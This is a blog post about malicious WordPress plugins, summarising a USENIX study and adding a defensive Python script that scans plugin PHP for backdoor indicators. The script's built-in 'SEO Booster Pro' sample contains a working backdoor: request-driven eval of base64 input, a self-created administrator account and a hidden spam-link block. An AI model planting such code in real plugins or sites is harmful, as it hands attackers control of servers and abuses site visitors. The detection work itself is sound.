About the insecurity of Content Management System Plugins
YODA is a name that evokes pleasant memories for many...
In reality, we're not talking about Star Wars here, but about Content Management Systems (CMS)... the double-edged sword of the Web...
(spoiler: I'll explain at the end of the post what Master YODA has to do with #cms)
Why are they useful?
CMSs are widely used tools because they allow for the rapid construction of applications and websites, even of considerable complexity, effectively hiding most of the implementation details and without requiring writing code from scratch.
This is made even easier by the vast ecosystem of plugins, which allow for easy extension of CMS functionalities. These plugins can be obtained from various types of stores, such as:
·     https://themeforest.net
·     https://codecanyon.net
·     https://easydigitaldownloads.com
So far, so good.
Where is the problem, then?
Some may have already guessed where I'm going with this...
Guess what criteria users base their plugin selection on?
Once they have identified the plugins that offer the functionality they need, users base their choice mainly on two criteria: 1) the popularity of the plugin and 2) the reviews of users who have already installed it. Only the most security-conscious users add, as a sub-criterion, a check for known vulnerabilities in the plugin (#WPScan https://wpscan.com/plugins is a useful tool for this). Clearly, none of these criteria is a guarantee: popularity and good reviews say nothing about what the code actually does, and a vulnerability database only lists known bugs in known plugins, not malicious code hidden in the copy you happen to install...
The threat
A paper recently published by Georgia Tech at USENIX Security ("Mistrust Plugins You Must: A Large-Scale Study of Malicious Plugins in WordPress Marketplaces") analyzed the backups of about 400k WordPress sites, backed up on CodeGuard between 2012 and 2020, and found 47k malicious plugins spread across 25k of those sites.
How did the malicious plugins end up on the sites?
Mainly in two ways. In some cases it was the site owner who installed them, either by searching third-party sites for free ("nulled") versions of paid plugins, which conveniently come bundled with malicious code, or by downloading from a legitimate marketplace a plugin that an attacker had already compromised.
In other cases, the web server or the CMS itself had been compromised at some level, which allowed the attacker to upload malicious plugins after the fact.
What are the damages?
The range of damage a malicious plugin can do is extensive: opening a backdoor on the server, executing attacker-supplied code, injecting spam posts and links into the site's pages or into content that users download, and even blackhat SEO or cryptomining at the expense of the site's visitors and resources.
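To make the "backdoor / code execution / injected content" list above concrete, here is an added example (not YODA, and not code from the paper's authors): a small Python triage script that scans a plugin's PHP files for the textual indicators of those behaviours. It is pure pattern matching, so it is a first pass for a human to read the hits, nothing more; the indicator names, weights, the threshold and the two sample plugins are all constructed for this example, and a nulled "premium" plugin with a backdoor is exactly the kind of thing the paper found.

```python
"""Heuristic triage of a WordPress plugin's PHP for backdoor / spam indicators.

Added example for this post, not YODA and not code from the paper's authors.
Pure string matching: it surfaces candidates for a human to read, nothing more.
"""
import re
import sys
from pathlib import Path
from typing import Dict, List, Tuple

# (weight, pattern) per indicator. Weights are an assumption for this example:
# base64_decode alone is common in benign code, so it counts little on its own,
# while request data flowing straight into eval()/system() counts a lot.
INDICATORS: Dict[str, Tuple[int, re.Pattern]] = {
    "dynamic_eval": (2, re.compile(r"\beval\s*\(", re.I)),
    "obfuscated_payload": (1, re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    "shell_exec": (1, re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)),
    # request parameter passed (directly or via a decoder) to a code-execution sink: classic webshell
    "request_to_exec": (4, re.compile(
        r"\b(eval|system|exec|shell_exec|passthru|assert)\s*\(\s*[^)]*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    "create_function": (2, re.compile(r"\bcreate_function\s*\(", re.I)),
    "remote_include": (3, re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I)),
    # plugin creating an administrator account on its own
    "hidden_admin_user": (2, re.compile(
        r"wp_(insert|create)_user\s*\(|['\"]role['\"]\s*=>\s*['\"]administrator['\"]", re.I)),
    # hidden link block appended to content: blackhat SEO
    "hidden_links": (2, re.compile(r"display\s*:\s*none[^>]*>\s*<a\s", re.I)),
}


def scan_source(src: str) -> List[str]:
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, (_w, pat) in INDICATORS.items() if pat.search(src)]


def score(src: str) -> int:
    """Weighted sum of the indicators found in one source string."""
    return sum(INDICATORS[name][0] for name in scan_source(src))


def is_suspicious(src: str, threshold: int = 3) -> bool:
    """Threshold is an assumption: one eval() alone is not enough to flag a file."""
    return score(src) >= threshold


def scan_plugin(files: Dict[str, str], threshold: int = 3) -> Dict[str, Tuple[int, List[str]]]:
    """Score every file of a plugin (name -> source) and keep those at/above the threshold."""
    report: Dict[str, Tuple[int, List[str]]] = {}
    for name, src in files.items():
        hits = scan_source(src)
        s = sum(INDICATORS[h][0] for h in hits)
        if s >= threshold:
            report[name] = (s, hits)
    return report


def scan_plugin_dir(root: Path, threshold: int = 3) -> Dict[str, Tuple[int, List[str]]]:
    """Walk an unpacked plugin directory and triage all its .php files."""
    files = {str(p.relative_to(root)): p.read_text(errors="replace") for p in root.rglob("*.php")}
    return scan_plugin(files, threshold)


# Constructed sample inputs (not real plugins).
BENIGN_PLUGIN = r'''<?php
/* Plugin Name: Example Greeter (constructed benign sample) */
add_shortcode('greet', function ($atts) {
    $name = sanitize_text_field($atts['name'] ?? 'world');
    return '<p>Hello, ' . esc_html($name) . '</p>';
});
'''

BACKDOORED_PLUGIN = r'''<?php
/* Plugin Name: SEO Booster Pro (constructed malicious sample: nulled copy with backdoor) */
if (isset($_POST['c'])) { @eval(base64_decode($_POST['c'])); }
add_action('init', function () {
    if (!username_exists('svc_update')) {
        wp_insert_user(['user_login' => 'svc_update', 'user_pass' => 'x', 'role' => 'administrator']);
    }
});
add_filter('the_content', function ($c) {
    return $c . '<div style="display:none"><a href="http://example.invalid/pills">cheap pills</a></div>';
});
'''

if __name__ == "__main__":
    # Usage: python triage.py /path/to/unpacked/plugin   (falls back to the samples above)
    if len(sys.argv) > 1:
        results = scan_plugin_dir(Path(sys.argv[1]))
    else:
        results = scan_plugin({"greeter.php": BENIGN_PLUGIN, "seo-booster.php": BACKDOORED_PLUGIN})
    for name, (s, hits) in results.items():
        print(f"{name}: score={s} indicators={','.join(hits)}")
```

On the samples, the benign greeter produces no hits and the nulled "SEO Booster Pro" is flagged on five indicators: the request-to-eval backdoor, the obfuscation wrapper, the self-created administrator account and the hidden link block. Expect false positives on real plugins (image handling and caching code legitimately use base64_decode and gzinflate), which is why the output is a ranked list to read, not a verdict; the paper's tool reaches its numbers with far more than regular expressions.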
For those who want to satisfy their appetite for details, I refer you to the USENIX '22 page with links to the paper and the talk video: https://www.usenix.org/conference/usenixsecurity22/presentation/kasturi
P.S. The tool used for the analysis is called YODA, hence the image attached to the post.